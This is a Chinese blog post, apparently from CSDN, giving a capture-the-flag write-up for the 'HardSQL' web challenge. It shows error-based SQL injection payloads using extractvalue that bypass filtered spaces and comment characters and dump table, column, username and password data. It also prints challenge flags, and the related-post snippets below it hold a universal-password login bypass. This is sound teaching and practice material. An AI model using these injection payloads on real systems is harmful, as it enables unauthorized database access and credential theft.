[极客大挑战 2019]HardSQL 1

最新推荐文章于 2023-10-13 07:00:51 发布
最新推荐文章于 2023-10-13 07:00:51 发布
阅读量485 收藏 2
点赞数 5
分类专栏: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/F1or_/article/details/119351294
版权

一开始直接尝试弱密码发现不行

输入admin’报错
在这里插入图片描述admin’'不报错证明双引号闭合于是构造union注入发现不行,被过滤了,双写绕不过,开始尝试报错注入

先看一下那些被过滤了
在这里插入图片描述

空格被过滤直接用()来进行代替

爆库

'or(extractvalue(1,concat(0x7e,(select(database())))))or'

由于#被过滤,这里用or’来进行闭合
在这里插入图片描述爆出数据库geek。
接下来payload

'or(extractvalue(1,concat(0x7e,(select(table_name)from(information_schema.tables)where(table_schema)like('geek')))))or'

'or(extractvalue(1,concat(0x7e,(select(group_concat(column_name))from(information_schema.columns)where(table_name)like('H4rDsq1')))))or'

'or(extractvalue(1,concat(0x7e,(select(group_concat(username,password))from(H4rDsq1)))))or'

在这里插入图片描述
最终只显示出左半部分flag,这是因为extractvalue和updatexml只显示32位字符

'or(extractvalue(1,concat(0x7e,(select(right(password,30))from(H4rDsq1)))))or'

爆出右半部分flag进行拼接
在这里插入图片描述flag{a60f3310-0d64-4be9-a4fc-fc90962e4213}

F1or
关注
  • 5
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 4
    评论
专栏目录
BUUCTF WEB笔记之[极客挑战2019] EasySQL、LoveSQL、BabySQLHardSQL
weixin_48799157的博客
03-26 2614
小白一个,记录一下解题过程,如有错误请指正! 一、EasySQL 1.这里我们使用一句话万能密码就可以了,记得加上# 1' or '1'='1'# 2.登录就可以拿到flag 二、LoveSQL 网页里说用sqlmap是没有灵魂滴,但是还是手痒试了一下,发现什么都扫不出来,可能是我太菜了能力还没到家,希望有大佬能指点一下~ 1.我们只能运用灵魂了,用万能句尝试一下,发现登录进来了,但是没有flag 2.猜测flag应该是放在某个字段里了,我们用联合注入(un...
BUUCTF-[极客挑战 2019]EasySQL 1
keaidxxn的博客
01-22 4485
刚开始看到用户名密码就尝试常用的用户名密码进行登录,发现并没有这么简单: 之后认真审题,发现是sql注入: 于是先在url处进行简单测试(这里可先随便输入账号密码,最主要的是看到它的传参处): 可以看到我们输入的账号密码都显示在url当中,因此可判断为一个get传参。 试下单引号加注释符号,前面随便写一个用户名a: 没有想到,这真的是easysql。 成功得到flag: flag{441bd892-3dcd-4bb0-9f8a-6dcb88954efa} ...
[极客挑战 2019]EasySQL
qq_52431855的博客
05-31 271
首先尝试注入发现是字符型注入。并且后台两个双引号闭合的 "" 然后尝试万能密码 1' or '1'='1 成功登录
buuctf-web-[极客挑战 2019]EasySQL
weixin_43345082的博客
06-17 846
sqlmap一把梭 直接用 payload
阿里云IoT极客创新挑战赛.pdf
08-29
高级设计专家 望海 在2018云栖大会·上海峰会中做了题为《阿里云 IoT 极客创新挑战赛》的分享,就极客挑战赛创意来源、赛事的技术平台、赛事进程等方面的内容做了深入的分析。
2019年三诺集团四周年庆典极客摇滚跑活动方案.pptx
05-06
此文档描述的是2019年三诺集团四周年庆典的一项独特活动——“极客摇滚跑”。这是一场集科技、运动和音乐于一体的大型庆典,旨在庆祝三诺集团的周年纪念,并促进北海市高新产业园及其相关企业的交流与合作。活动的...
ISCC2019个人挑战赛题目练习
05-05
【ISCC2019个人挑战赛题目练习】是一次针对网络安全技术的竞赛,旨在提升参赛者在信息安全领域的技能和实战经验。此类挑战通常涵盖多种技术领域,包括但不限于密码学、漏洞分析、网络嗅探、逆向工程、Web安全以及...
天池Apache Flink极客挑战赛-垃圾图片分类算法源码+项目说明.zip
最新发布
01-28
【资源说明】 1、该资源包括项目的全部源码,下载可以直接使用! 2、本项目适合作为计算机、数学、电子信息等专业的课程设计、期末大作业和毕设项目,...天池Apache Flink极客挑战赛-垃圾图片分类算法源码+项目说明.zip
极客学院JAVA视频教程 新版 7大部分
08-08
Java语言视频教程 极客学院JAVA视频教程 新版 7大部分
BUUCTF刷题笔记——[极客挑战 2019]EasySQL 1
永远是少年
07-05 1020
今天继续刷BUUCTF的题,今天解决[极客挑战 2019]EasySQL 1。 一、题目基本信息 二、解题思路 三、拿到flag
BUUCTF Web 极客挑战 2019 EasySQL
Brilliant_orange的博客
11-22 761
(当然,我们只是猜测闭合符号是单引号,其他题目也可能是双引号)接下来,我们试试用一下万能账号或者密码两种方法(优先级:【and】>【=】>【or】,语句为真,可行,得到flag。(#后面内容注释掉了),也为真,得到flag。
Buuctf-Web-[极客挑战 2019]EasySQL 1 题解及思路总结
m0_62239233的博客
09-16 8460
SQL注入。
[极客挑战 2019]EasySQL【SQL注入】
weixin_38832257的博客
08-13 1259
题目名称:[极客挑战 2019]EasySQL题目平台:BUUCTF题目类型:Web考察知识点:SQL注入。
极客挑战 2019】EasySQL
Lixunzhe0112的博客
01-17 387
admin ’ or 1=1 # + admin //之后又尝试了password后面也是可以进行注入的。尝试用admin+admin进行登陆给出:NO,Wrong username password!然后尝试在uasername后进行sql注入。登陆成功,并且给出了flag。
BUUCTF[极客挑战 2019] EasySQL 1
m0_75178803的博客
06-12 4176
因为这道题是基于sql单引号的注入,我们构造万能密码,#在sql注入中是注释符。题目来源:BUUCTF [极客挑战 2019] EasySQL 1。用or连接,因为1=1恒真,假或真=真,真或真=真,所以这个语句恒成立。输入 1' union select 1,2,3。查看报错信息发现是基于单引号的注入。由一道题简单引出万能密码的知识点。这是查询数据库可能会用到的句型。只有当输入1’时,页面报错。直接在用户名或者密码区输入。只有当列名字段数为3时,
[极客挑战 2019]HardSQL1 解题思路
xiyuanyue的博客
10-13 206
flag{d23142e7-2546-47c3-b238-de只返回一部分flag是因为updatexml 函数返回错误信息长度是112个字符,所以要对password 截取一部分,可以通过,substr left right函数做处理 ,substr函数已经禁止,就用right函数。2、尝试联合注入、时间盲注 发现 and union /**/ /*!2、关键字替换(空格替换,单引号替换,等号替换);3、通过错误函数updatexml 获取数据库、表、字段。3、错误函数、时间盲注、条件盲注。
极客挑战 2019]LoveSQL 1
08-24
LoveSQL 1是极客挑战2019的一个题目,它是一个关于 SQL 查询语言的挑战。具体来说,LoveSQL 1要求参赛者编写一个 SQL 查询,从给定的表中获取满足特定条件的数据。这个挑战旨在考察参赛者对 SQL 语法和查询的理解...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 4
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值